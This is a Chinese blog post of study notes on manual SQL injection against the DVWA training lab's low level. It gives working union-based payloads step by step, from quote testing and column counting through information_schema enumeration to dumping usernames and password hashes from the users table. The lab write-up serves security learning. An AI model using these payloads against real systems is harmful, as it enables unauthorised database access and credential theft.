sql手工注入dvwa初级靶场

已于 2023-02-14 20:38:07 修改
阅读量1.5k 收藏 15
点赞数 3
分类专栏: web 文章标签: sql 数据库 mysql
于 2023-02-13 22:12:36 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/afanzcf/article/details/129018080
版权

sql手工注入dvwa靶场

记录一下自己重新开始学习web安全之路④。

一、找交互点(url、搜索框、登录框)

在dvwa靶场中,发现有url,有搜索框。

二、找注入点(通过 ’ 号来判断)

思考一:为什么能通过 ’ 号能判断是否为注入点?

正常情况下: 加上单引号之后:

int类型 整型 where id = 2 int类型 整型 where id = 2 ’

char类型 字符型 where id = ‘2’ char类型 字符型 where id = ‘2’’

在搜索框中输入1’ , 发现回显不正常,且提示有sql语句的错误。

1

三、判断注入类型(①int型、②char型)

分别在交互点输入 1 and 1=1 1 and 1=2
真 与 真 真 与 假

如果两次回显结果一样,则是char类型 ;

如果两次回显不一样,则是int类型 ;

思考二:为什么两次回显结果一样就是char类型,不一样就是int类型?

char类型在带入数据库时会自动加上’ ’ ,并没有执行and语句,而是全部转换为了字符串。‘1 and 1=1’、‘1 and 1=2’

2

3

通过判断,发现该注入类型为char类型。

思考三:为什么要先判断注入类型?

一、因为如果是整数型类型,用字符型的代码去注入会失败,且在判断列数时,输入的整数型代码,不管判断多少列都会回显正常。

二、字符类型的在注入时,会加 ’ 单引号闭合,注释符 # 或者 --+ 注释。

判断注入类型这决定了如何来构造后面的sql语句

思考四:为什么要加 ’ 单引号闭合,注释符注释?

因为是字符型,有两个单引号 ’ ’ ,我们加 ’ 单引号是为了闭合最前面的单引号,加注释符注释后面的那个单引号,这样就能执行我们所构造的sql语句。

例如:1’ order by 2#, 实际是’ 1 ’ order by 2#’

井号后面的单引号被注释掉了。

四、判断列数(order by、二分法)

1’ order by 2#

5

五、查看回显位置(union 联合 select查询)

1’ and 1=2 union select 1,2#

1’ //单引号是为了闭合前面的那个 ’ 单引号

and 1=2 //这是一个逻辑错误,1不可能=2,是为了避免一些只显示一行的页面过滤掉后面的联合查询的数据,所以让前面的查询条件永远为错。

union //union就是合并操作,完整语义就是使用union合并两个select的结果集,前者为空,后者结果为1,2,3,4,5,所以就会把这些结果合并然后显示到对应的字段。如果前半句为假,则只执行后半句。所以为什么要and 1=2.

在这里插入图片描述

思考五:为什么要查看回显位置?

在web上访问一个网站时,并不是所有信息都会反馈到屏幕上,显示的信息即回显;数据库中同理,并不是所有的select语句都会将结果显示在屏幕上。

因此,我们为了能够在屏幕上看到我们输入的select语句的结果反馈,需要判断回显位置。

六、查看数据库名称(dvwa)

1’ and 1=2 union select database(),2#

1’ //单引号了为了闭合前面的单引号

and1=2 //让逻辑错误,执行union 的后半段

union select database(),2# //查询database()数据库名称

6

七、查看数据表名称(guestbook、users)

1’ and 1=2 union select group_concat(table_name),2 from information_schema.tables where table_schema=‘dvwa’#

group_concat(table_name) //以group组形式查表名,然后用concat拼接。

table_name,2 from information_schema.tables //从数据库的所有表中查找

where table_schema=‘dvwa’# //从dvwa的数据库中,table_schema对应的是数据库名称

即从dvwa的数据库中,找所有数据表的名称

7

八、查看数据列名称()

写法一(正常写法):1’ and 1=2 union select group_concat(column_name),2 from information_schema.columns where table_schema=‘dvwa’ and table_name=‘users’#

8

写法二(偷懒写法):1’ and 1=2 union select group_concat(column_name),2 from information_schema.columns where table_name=‘users’#

9

九、查看数据

1’ and 1=2 union select concat(user,‘—’,password),2 from users#

10

11

Afanbird
关注
  • 3
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Kali linux在DVWA靶场SQL注入
qq_74298120的博客
06-20 1725
SQL注入是一种常见的攻击方式,攻击者通过利用Web应用程序或其他应用程序对数据库的查询进行注入,掌控数据库系统,甚至控制整个应用程序。为了加强Web应用程序的安全性,学习SQL注入攻击技能的同时也要了解防御措施。
sql手工注入实战
mulincong的博客
05-30 2214
sql手工注入封神台靶场
sqli-labs靶场(1-22关)
weixin_51566481的博客
08-16 7419
sqli-labs,sql注入,burpsuit
DVWA——SQL注入
最新发布
m0_74426634的博客
04-07 849
日前,国内最大的程序员社区CSDN网站的用户数据库被黑客公开发布,600万用户的登录名及密码被公开泄露,随后又有多家网站的用户密码被流传于网络,连日来引发众多网民对自己账号、密码等互联网信息被盗取的普遍担忧。网络安全成为了现在互联网的焦点,这也恰恰触动了每一位用户的神经,由于设计的漏洞导致了不可收拾的恶果,验证了一句话“出来混的,迟早是要还的”,所以介绍一些常用的攻击技术和防范策略。SQL Injection也许很多人都知道或者使用过,如果没有了解或完全没有听过也没有关系,因为接下来我们将介绍SQL Inj
DVWA靶场全解析(新手向)
LS_Sy的博客
02-18 1618
我们直接在输入栏内随便填写数据,之后使用bp进行抓包抓到包后发送到instruder模块进行爆破,由于需要同时爆破用户名和密码两个字段,所以我们选择集束炸弹模式设置好字典后开始爆破,最后根据响应头的不同得到用户名和密码。
自学渗透测试:使用 DVWASQLmap 探寻 SQL 注入攻击与防范
weixin_43263566的博客
01-04 2505
SQL注入漏洞
kali2021.3安装dvwa靶场
02-24
标题中的“kali2021.3安装dvwa靶场”是指在Kali Linux 2021.3版本中安装DVWA(Damn Vulnerable Web Application)的过程,这是一个广泛用于Web安全学习和实践的模拟靶场。描述中提到,这个教程是为刚接触Kali的爱好...
DVWA靶场环境---新手入坑
10-28
DVWA靶场环境---新手学习web安全的必备靶场之一,DVWA (Dam Vulnerable Web Application)是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序。包含了SQL注入、XSS、盲注等常见的一些安全漏洞。
DVWA靶场安装教学
06-08
1. SQL Injection:DVWA靶场提供了SQL Injection漏洞测试场景,用户可以学习如何进行SQL Injection攻击和防御。 2. Cross-Site Scripting(XSS):DVWA靶场提供了XSS漏洞测试场景,用户可以学习如何进行XSS攻击和...
sqlmap在windows上执行sql注入,利用dvwa靶场.md
05-19
分享一下自己学习sqlmap的过程,因为网上的资源很少,所以就想着写个博客记录一下,同时也分享一下吧。就先讲到这里吧,有问题的可以私信。欢迎大家提意见。
DVWASQL注入详解(包含知识点)
10-20
该文档是使用DVWA平台进行的SQL注入(low)级别的详细操作和知识点分析,包括什么是SQL注入,如何进行SQL注入,图文并茂,包含了几个非常不错的操作,解决了各种问题。
关于DVWA靶场SQL Injection(low,medium,high)代码分析及注入分析
qq_22792465的博客
06-10 401
下图为源码中提交表单action='#'的作用是将数据提交到当前页面。
DVWASQL注入(盲注)
天空之蓝的博客
11-17 2550
SQL Injection(Blind),即SQL盲注,与一般注入的区别在于,一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知,因此盲注的难度要比一般注入高。目前网络上现存的SQL注入漏洞大多是SQL盲注。手工盲注的过程,就像你与一个机器人聊天,这个机器人知道的很多,但只会回答“是”或者“不是”,因此你需要询问它这样的问题,例如“数据库名字的第一个字母是不是a啊?”,通过这种机械的询问,最终获得你想要的数据。
DVWA综合靶场练习:SQL injection-低中高
流浪法师的博客
05-26 209
DVWA综合靶场练习:SQL injection-低中高
DVWA靶场SQL注入
走马
11-07 138
得到两个值去hex解码分别是 guestbook,users这两个也是DVWA数据库下面的所有表名,根据表的名字就可以判断出账号与密码存储在了users这个表里面,所以我们要对这个表进行查询,查询这个表里面的所有字段,开始构造SQL语句。对这些内容分别进行解码,将要查询的字段提取出来,分别是user与password,再次构造SQL语句对这两个字段的内容进行查询。本次注入的是DVWA靶场SQL injection。1.判断是字符型注入还是数字型注入,构造SQL语句。4.联合查询,尝试查看内容回显的地方。
Dvwa练习06 SQL注入(Low)
coco3105的博客
02-19 1139
等级low分别用了手工sqlmap注入,medium没实践,high采用的是旧版本,没过滤参数。
DVWASQL注入
geejkse_seff的博客
07-30 355
DVWA是一款基于PHP和MYSQL开发的web靶场练习平台,集成了常见的web漏洞如。
封神台-SQL注入实战靶场1-4题解题过程
qq_43367379的博客
05-19 1018
背景 这是最基本的显错注入 已经给出SQL查询语句 select * from user where id=1 不需要先去判断是字符型还是数字型,去一步一步测出sql查询语句了 废话不多说,直接上解题步骤 1.在url地址栏上 ?id=1 后面拼接 order by 3 说明: 所有操作都是在地址栏上拼接字符串实现的,没有借助工具 https://...?id=1 order by 3 结果为 正确显示 当前用户的账号和密码 2.在url地址栏上 ?id=1 后面拼接 order by 4 https://
pikachu靶场SQL注入解题思路
weixin_44500257的博客
02-21 1530
第一关 数字型注入(POST) 操作界面如下图 使用burpsuit对流量进行抓包,把数据包发送到Repeater模块进行测试 发送正常流量,web界面正常响应情况如下图所示 首先我们要了解该关卡注意的考点①数据类型是数字型②提交方式是POST 注入点的判断有很多方式,核心的思想就是id=后面的参数能否带入数据库查询,如果参数是数据库查询语句能否执行payload语句。 判断第一步:id=1 后面加 ‘ “ ‘) “)来查询后台SQL查询语句id的闭合方式 ‘ 报错 “报错 ‘) 报错 “
dvwa靶场sql注入初级
07-27
对于DVWA靶场SQL注入初级问题,你可以按照以下步骤进行操作: 1. 首先,打开DVWA靶场并登录。如果你还没有安装DVWA,请先下载并安装它。 2. 在DVWA的主界面上,选择"SQL Injection"选项卡。 3. 在"Select your ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值